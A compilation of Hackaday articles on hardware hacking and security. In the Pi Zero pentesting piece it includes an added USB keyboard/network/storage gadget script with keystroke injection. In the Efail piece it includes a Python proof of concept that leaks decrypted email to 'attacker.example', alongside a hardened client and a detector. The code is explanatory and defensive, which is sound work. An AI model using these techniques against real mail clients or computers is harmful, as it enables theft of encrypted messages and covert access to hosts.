Cracking The Case Of Capcom’s CPS2 Security

We love a good deep-dive on a specialized piece of technology, the more obscure the better. You’re getting a sneak peek into a world that, by rights, you were never meant to know even existed. A handful of people developed the system, and as far as they knew, nobody would ever come through to analyze and investigate it to find out how it all went together. But they didn’t anticipate the tenacity of a curious hacker with time on their hands.

[Eduardo Cruz] has done a phenomenal job of documenting one such system: the anti-piracy mechanisms present in the Capcom CPS2 arcade board. He recently wrote in to tell us he’s posted his third and final entry on the system, this time focusing on figuring out what a mysterious six-pin header on the CPS2 board did. Having heard from others that fiddling with this header occasionally caused the CPS2 board to erase the game, he knew it must be something important. Hackaday Protip: if there’s a self-destruct mechanism attached to it, that’s probably the cool part.

He followed the traces from the header connector, identified on the silkscreen as C9, back to a custom Capcom IC labeled DL-1827. After decapping the DL-1827 and putting it under the microscope, [Eduardo] made a surprising discovery: it wasn’t actually doing anything with the signals from the header at all. Once the chip is powered up, it simply passes those signals straight through to another chip, the DL-1525.

[Eduardo] notes that this deliberate attempt at obfuscating which chips are actually connected to different headers on the board is a classic trick that companies like Capcom would use to try to make it harder to hack into their boards. Once he figured out DL-1525 was what he was really after, he was able to use the information he gleaned from his earlier work to piece together the puzzle.

This particular CPS2 hacking journey only started last March, but [Eduardo] has been investigating the copy protection systems on arcade boards since 2014.

[Thanks to Arduino Enigma for the tip.]

Distorted Text Says A Lot

Getting bounced to a website by scanning a QR code is no longer an exciting feat of technology, but what if you scanned the ingredient list on your granola bar and it went to the company’s page for that specific flavor, sans the matrix code?

Bright minds at Columbia University in the City of New York have “perturbed” ordinary font characters so the average human eye won’t pick up the changes. Even ordinary OCR won’t miss a beat when it looks at a passage with a hidden message. After all, these “perturbed” glyphs are like a perfectly legible character viewed through a drop of water. When a camera is looking for these secret messages, though, those minor tweaks speak volumes.

The system is diabolically simple. Each character can be distorted according to an algorithm and a second variable. Changing that second variable is like twisting a distorting lens, or a water drop: the glyph still reads as the same letter, but the distortion can be measured and the variable extracted. This kind of encoding survives a trip through the printer, unlike a purely digital hidden message.

Hidden messages like these are not limited to passing notes: metadata can be attached to any text and extracted when necessary. A textbook could carry notes without taking up page space, and a cell phone could act like an X-ray machine to reveal what the teacher wants to show. For example, you could define what “crypto” actually means.


“Watch Dogs” Inspired Hacking Drone Takes Flight

They say that life imitates art, which in modern parlance basically means if you see something cool in a video game, movie or TV show, you might be inclined to try and build your own version. Naturally, such things generally come in the form of simple props, perhaps with the occasional embedded LED or noise making circuit. It’s not as if you can really build a phaser from Star Trek or a phone booth that’s bigger on the inside.

But after seeing the hacking quadcopter featured in the video game Watch Dogs 2, [Glytch] was inspired to start work on a real-world version. It doesn’t look much like the drone from the game, but that was never the point. The idea was to see how practical a small flying penetration testing platform is with current technology, and judging by the final build, we’d say he got his answer.

All the flight electronics are off the shelf quadcopter gear. It’s running on a Betaflight OMNIBUS F4 Pro V2 Flight controller with an M8N GPS mounted in the front and controlling the 2006 2400KV motors with a DYS F20A ESC. Interestingly [Glytch] is experimenting with using LG HG2 lithium-ion cells to power the quad rather than the more traditional lithium-polymer pack, though he does mention there are some issues with the voltage curve between the two battery technologies.

But the real star of the show is the payload: a Hak5 WiFi Pineapple Nano. As the Pineapple provides a turn-key penetration testing platform on its own, [Glytch] just needed a way to safely carry it and keep it powered. The custom frame keeps it snug, and the 5 V Battery Eliminator Circuit (BEC) on the DYS F20A ESC, combined with a female USB port, powers the Pineapple without any hardware modifications.

We’ve seen quadcopters with digital weaponry before, though not nearly as many as you might think. But as even the toy grade quadcopters become increasingly capable, we imagine the airborne hacking revolution isn’t far away.


Explaining Efail And Why It Isn’t The End Of Email Privacy

Last week the PGPocalypse was all over the news… Except that, well, it wasn’t an apocalypse.

A team of researchers published a paper (PDF) in which they describe how to decrypt a PGP-encrypted email via a targeted attack. The research itself is well documented and, from a security researcher’s perspective, it’s a good paper to read, especially the cryptography parts.

But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending that everyone turn off PGP encryption in all email clients, but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people, simply because an attacker must already have a copy of the encrypted email to use the exploit. Advising everyone to disable encryption altogether just makes no sense.

Aside from the massive false alarm, Efail is a very interesting exploit to wrap your head around. Join me after the break as I walk through how it works, and what you can do to avoid it.


DIY Pi Zero Pentesting Tool Keeps It Cheap

It’s a story as old as time: hacker sees cool tool, hacker recoils in horror at the price of said tool, hacker builds their own version for a fraction of the price. It’s the kind of story that we love here at Hackaday, and has been the impetus for countless projects we’ve covered. One could probably argue that, if hackers had more disposable income, we’d have a much harder time finding content to deliver to our beloved readers.

[Alex Jensen] writes in to tell us of his own tale of sticker-shock-induced hacking, in which he builds his own version of the Hak5 Bash Bunny. His version might be lacking a bit in the visual flair department, but despite coming in at a fraction of the cost, it does manage to pack in an impressive array of features.

This pentesting multitool can act as a USB keyboard, a mass storage device, and even an RNDIS Ethernet adapter, all in an effort to fool the computer you plug it into so that it lets you do something you shouldn’t. Like its commercial inspiration, it features an easy-to-use scripting system that lets new attacks be crafted on the fly with nothing more than a text editor. A rudimentary user interface is provided by four DIP switches and light-up tactile buttons. These let you select which attack runs without first hooking the device up to a computer, and the LEDs report what the device is doing.

[Alex] utilized some code from existing projects, namely PiBunny and rspiducky, but much of the functionality is of his own design. Detailed instructions are provided on how you can build your own version of this handy hacker gadget without breaking the bank.
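As an added example (not [Alex]’s code, and not taken from PiBunny or rspiducky), here is how those three personalities are built on a Pi Zero with the kernel’s configfs gadget interface: one composite gadget with an HID keyboard function, an RNDIS Ethernet function and a mass-storage LUN, plus a helper that types a key through the resulting /dev/hidg0. It assumes the dwc2 overlay and libcomposite are already loaded; the vendor/product IDs, strings, disk-image path and the GADGET_APPLY switch are illustrative choices, not anything from the project.

```shell
#!/bin/sh
# Added example: configfs composite gadget (HID keyboard + RNDIS + mass storage)
# for a Raspberry Pi Zero. Assumes `dtoverlay=dwc2` in /boot/config.txt and
# `modprobe libcomposite` have been done. IDs, strings and paths are illustrative.
set -u

# Standard 63-byte USB boot-keyboard report descriptor, written as octal escapes
# so that a POSIX printf emits it byte for byte.
KBD_REPORT_DESC='\005\001\011\006\241\001\005\007\031\340\051\347\025\000\045\001\165\001\225\010\201\002\225\001\165\010\201\003\225\005\165\001\005\010\031\001\051\005\221\002\225\001\165\003\221\003\225\006\165\010\025\000\045\145\005\007\031\000\051\145\201\000\300'

# setup_gadget <configfs usb_gadget dir> <backing image for the mass-storage LUN>
# The root is a parameter so the same function can be dry-run in a scratch dir.
setup_gadget() {
    root=$1; image=$2
    g="$root/g1"
    mkdir -p "$g" "$g/strings/0x409" "$g/configs/c.1/strings/0x409"
    echo 0x1d6b > "$g/idVendor"      # Linux Foundation (illustrative)
    echo 0x0104 > "$g/idProduct"     # Multifunction Composite Gadget
    echo 0x0100 > "$g/bcdDevice"
    echo 0x0200 > "$g/bcdUSB"
    echo 0123456789 > "$g/strings/0x409/serialnumber"
    echo "Example Labs" > "$g/strings/0x409/manufacturer"
    echo "Pi Zero Multitool" > "$g/strings/0x409/product"
    echo "HID+RNDIS+Storage" > "$g/configs/c.1/strings/0x409/configuration"
    echo 250 > "$g/configs/c.1/MaxPower"

    # 1. Keyboard: shows up on the Pi as /dev/hidg0 once the gadget is bound.
    mkdir -p "$g/functions/hid.usb0"
    echo 1 > "$g/functions/hid.usb0/protocol"       # 1 = keyboard
    echo 1 > "$g/functions/hid.usb0/subclass"       # 1 = boot interface
    echo 8 > "$g/functions/hid.usb0/report_length"  # 8-byte boot keyboard report
    printf "$KBD_REPORT_DESC" > "$g/functions/hid.usb0/report_desc"

    # 2. RNDIS Ethernet: Windows hosts bring this up without extra drivers,
    #    which is what makes the Pi usable as a rogue network adapter.
    mkdir -p "$g/functions/rndis.usb0"

    # 3. Mass storage backed by a disk image
    #    (e.g. dd if=/dev/zero of=disk.img bs=1M count=64 && mkfs.vfat disk.img).
    mkdir -p "$g/functions/mass_storage.usb0/lun.0"
    echo "$image" > "$g/functions/mass_storage.usb0/lun.0/file"
    echo 1 > "$g/functions/mass_storage.usb0/lun.0/removable"

    # Enable all three functions in configuration c.1.
    for f in hid.usb0 rndis.usb0 mass_storage.usb0; do
        ln -sf "$g/functions/$f" "$g/configs/c.1/$f"
    done
}

# bind_gadget <configfs usb_gadget dir>: attach to the first UDC (the Pi Zero's dwc2).
bind_gadget() {
    ls /sys/class/udc | head -n 1 > "$1/g1/UDC"
}

# press_key <hid device> <modifier byte> <HID usage code>
# Writes one 8-byte press report (modifiers, reserved, six key slots) and then
# an all-zero release report; usage 0x04 is 'a', modifier 0x02 is left shift.
press_key() {
    dev=$1
    report=$(printf '\\%03o\\000\\%03o\\000\\000\\000\\000\\000' "$2" "$3")
    printf "$report" > "$dev"
    printf '\000\000\000\000\000\000\000\000' >> "$dev"
}

# Only touch the real configfs when explicitly asked (run as root on the Pi).
if [ "${GADGET_APPLY:-0}" = 1 ]; then
    setup_gadget /sys/kernel/config/usb_gadget /opt/multitool/disk.img
    bind_gadget /sys/kernel/config/usb_gadget
    press_key /dev/hidg0 0 4     # smoke test: types 'a' on the host
fi
```

Run it as root on the Pi with `GADGET_APPLY=1`; without that variable it only defines the functions, so you can point `setup_gadget` at a scratch directory to check what it would write. A DIP-switch front end like [Alex]’s just has to decide which of the three functions to link into `configs/c.1` before writing the UDC name.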

Given how small and cheap it is, the Raspberry Pi is gaining traction in the world of covert DIY penetration testing tools. While it might not be terribly powerful, there’s something to be said for a device that’s cheap enough that you don’t mind leaving it at the scene if you’ve got to pull on your balaclava and make a break for it.

PGP Vulnerability Pre-announced By Security Researcher

From the gaping maw of the infosec Twitterverse comes horrifying news. PGP is broken. How? We don’t know. When will there be any information on this vulnerability? Tomorrow. It’s the most important infosec story of the week, and it’s only Monday. Of course, this vulnerability already has a name. Everyone else is calling it eFail, but I’m calling it Fear, Uncertainty, and Doubt.

Update: the eFail site and paper are now available. They were released ahead of Tuesday’s planned announcement after the news broke the press embargo.

Update 2: The report describes two attacks. The Direct Exfiltration attack wraps the body of a PGP-encrypted email in an image tag split across MIME parts. If a mail client automatically decrypts the email and renders the result as one HTML document, the outcome is a request to a URL containing the plaintext of the encrypted email. The second attack modifies the ciphertext itself (the CBC/CFB gadget attack) and, against OpenPGP, only works about one-third of the time. Mitigations are to decrypt outside the mail client, disable HTML rendering (or at least the loading of remote content), and, in time, update the OpenPGP and S/MIME standards. This is not the end of PGP; it’s a vulnerability warranting attention from those with a very specific use case.
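The Direct Exfiltration shape described above, and the reason it needs the attacker to already hold the ciphertext, as an added example that is not the paper’s or Hackaday’s code. It builds the three-part MIME message, then runs it through a naive client (auto-decrypt, concatenate parts into one HTML document, load remote images) and a hardened one (each part rendered on its own, decrypted text shown as text, remote loads off), plus a gateway heuristic that flags the sandwich. The PGP layer is a stand-in lookup table: the leak is a MIME/HTML handling bug, not a cipher break, so the ciphertext, host name and message text are all constructed placeholders.

```python
"""Efail-style direct exfiltration on a constructed message (added example,
not code from the Efail paper or Hackaday). The PGP layer is a stand-in."""
import re
from email.message import EmailMessage

# Constructed placeholder, not real OpenPGP data. A real attacker pastes the
# victim's genuine ciphertext here and lets the victim's client decrypt it.
FAKE_CIPHERTEXT = (
    "-----BEGIN PGP MESSAGE-----\n"
    "PLACEHOLDER-NOT-REAL-OPENPGP-DATA=\n"
    "-----END PGP MESSAGE-----"
)
FAKE_KEYRING = {FAKE_CIPHERTEXT: "Meeting moved to 09:00, door code 4471."}


def fake_decrypt(armored):
    """Stand-in for the client's automatic decryption (gnupg in real life)."""
    return FAKE_KEYRING[armored.strip()]


def has_pgp_armor(body):
    return "-----BEGIN PGP MESSAGE-----" in body


def parts_of(msg):
    """Immediate MIME parts, or the message itself when it is single-part."""
    return list(msg.iter_parts()) or [msg]


def build_efail_message(attacker_host, ciphertext):
    """Attacker's message: an HTML part that opens <img src=", the stolen
    ciphertext (inline-armored here; a PGP/MIME part splices the same way),
    then an HTML part that closes the attribute."""
    msg = EmailMessage()
    msg["From"] = "someone@example.net"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Re: notes"
    msg.make_mixed()
    for text, subtype in (
        ('<img src="http://%s/' % attacker_host, "html"),
        (ciphertext, "plain"),
        ('">', "html"),
    ):
        part = EmailMessage()
        part.set_content(text, subtype=subtype)
        msg.attach(part)
    return msg


def build_plain_pgp_message(ciphertext):
    """An ordinary inline-PGP message for comparison: one part, nothing to splice."""
    msg = EmailMessage()
    msg["Subject"] = "notes"
    msg.set_content(ciphertext)
    return msg


IMG_SRC = re.compile(r'<img[^>]*\ssrc="([^"]*)"', re.IGNORECASE)


def remote_loads(html):
    """URLs a renderer would fetch. The browser URL parser drops tab/CR/LF, so
    the line breaks between spliced parts do not break the exfiltration URL."""
    return [re.sub(r"[\t\r\n]", "", u) for u in IMG_SRC.findall(html)]


def naive_client(msg, decrypt=fake_decrypt):
    """Vulnerable behaviour: auto-decrypt, concatenate every part into one HTML
    document, load remote images. Returns the URLs that would be requested."""
    html = ""
    for part in parts_of(msg):
        body = part.get_content()
        if has_pgp_armor(body):
            body = decrypt(body)
        html += body
    return remote_loads(html)


def hardened_client(msg, decrypt=fake_decrypt, load_remote=False):
    """Each part is its own document, decrypted text is shown as text rather
    than spliced into neighbouring HTML, and remote loads are off unless the
    user opts in. Returns (rendered parts, URLs requested)."""
    shown, fetched = [], []
    for part in parts_of(msg):
        body = part.get_content()
        if has_pgp_armor(body):
            shown.append(("decrypted-text", decrypt(body)))
            continue
        shown.append((part.get_content_type(), body))
        if load_remote and part.get_content_type() == "text/html":
            # Alone, '<img src="http://...' never closes, so nothing is fetched.
            fetched.extend(remote_loads(body))
    return shown, fetched


def sandwiched_ciphertext(msg):
    """Gateway heuristic: an encrypted part preceded by an HTML part that leaves
    a tag or attribute open. Flag it, or strip the HTML parts before delivery."""
    parts = parts_of(msg)
    for i, part in enumerate(parts):
        if not has_pgp_armor(part.get_content()):
            continue
        for earlier in parts[:i]:
            if earlier.get_content_type() != "text/html":
                continue
            h = earlier.get_content()
            if h.count("<") != h.count(">") or h.count('"') % 2:
                return True
    return False


if __name__ == "__main__":
    m = build_efail_message("attacker.example", FAKE_CIPHERTEXT)
    print(m.as_string())
    print("naive client fetches:", naive_client(m))
    print("hardened client fetches:", hardened_client(m, load_remote=True)[1])
    print("gateway flags it:", sandwiched_ciphertext(m))
```

Running it prints the raw three-part message followed by the naive client’s request, `http://attacker.example/Meeting moved to 09:00, door code 4471.`, while the hardened client requests nothing even with remote loading on, because no single part contains a complete tag. Note that the hardened client still decrypts; the fix is in how the output is placed, not in the cryptography.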

Update 3: Hackaday has published an in-depth explanation of how eFail works which details the scope of the vulnerability.

[Sebastian Schinzel] announced on Twitter today that he will be publishing a critical vulnerability in PGP/GPG and S/MIME email encryption. This vulnerability may reveal the plaintext of encrypted emails. There are currently no fixes, but there’s no proof of concept, or any actual publication of this exploit, either. The only thing that’s certain: somebody on Twitter said encrypted email is broken.

The EFF has chimed in on this exploit and advises everyone to immediately disable and uninstall tools that automatically decrypt PGP-encrypted email. It also looks like the EFF came up with a great little logo for eFail as well so kudos on that.

While there are no details whatsoever concerning eFail aside from a recommendation to not use PGP, a few members of the community have seen a pre-press of the eFail paper. [Werner Koch] of GnuPG says eFail is simply using HTML as a back channel. If this is true, PGP is still safe; you just shouldn’t use HTML emails. If you really need to read HTML emails, use a proper MIME parser and disallow access to external links. It should be noted that HTML in email is already an attack vector and has been for decades. You don’t need to bring PGP into this.

Should you worry about a vulnerability in PGP and email encryption? Literally no one knows. European security researchers are working on a publication release right now, but other experts in the field who have seen the paper think it’s not a big deal. There is no consensus from experts in the field, and there is no paper available right now. That last point will change in a few hours, but for now eFail just stands for Fear, Uncertainty, and Doubt.

A Home Network, Security System, And A Hidden Room Behind A Bookcase

Ok, now this is something special. This is a home network and security system that would make just about anyone stop, and with jaw hanging agape, stare, impressed at the “several months of effort” it took [timekillerjay] to install their dream setup. Just. Wow.

Want a brief rundown of the diverse skill set needed to pull this off? Networking, home security, home automation, woodworking, running two thousand feet(!) of Cat 6a cable, a fair hand at drywall work for the dozens upon dozens of patches, painting, staining, and, while not a skill, definitely necessary: an amazingly patient family.

Ten PoE security cameras monitor the premises with audio recording, infrared, and motion detection capabilities. This is on top of magnetic sensors for five doors and eleven windows that feed back to an ELK M1-Gold security system, which effortlessly coordinates with an Insteon ISY994i smart home hub; this allows automatic events, such as turning on lights after dark when a door is opened, to occur as [timekillerjay]’s family moves about their home. The ELK also allows [timekillerjay] to control other things around the house, namely the sprinkler system, via relays. [timekillerjay] says he lost track of how many smart switches are scattered throughout his home, but there are definitely 39 network drops that service the premises.

All of the crucial components are hidden in his office, behind a custom bookshelf. Building it required a few clever tricks to disguise the bookshelf for the secret door that it is, as well as selecting components with attention to how much noise they generate — what’s the point of a hidden security system if it sounds like a bunch of industrial fans?

An uninterruptible power supply will keep the entire system running for about 45 minutes if there is a power outage, with the cameras recording and the system logging everything all the while. Not trusting the entrance to his vault to something from Batman, he’s also fitted the bookshelf with a 600 lb magnetic lock that engages when the system is armed and the door is already closed. A second UPS will keep the door secured for 6+ hours if the house loses power. Needless to say, we think this house is well secured.

[Via /r/DIY]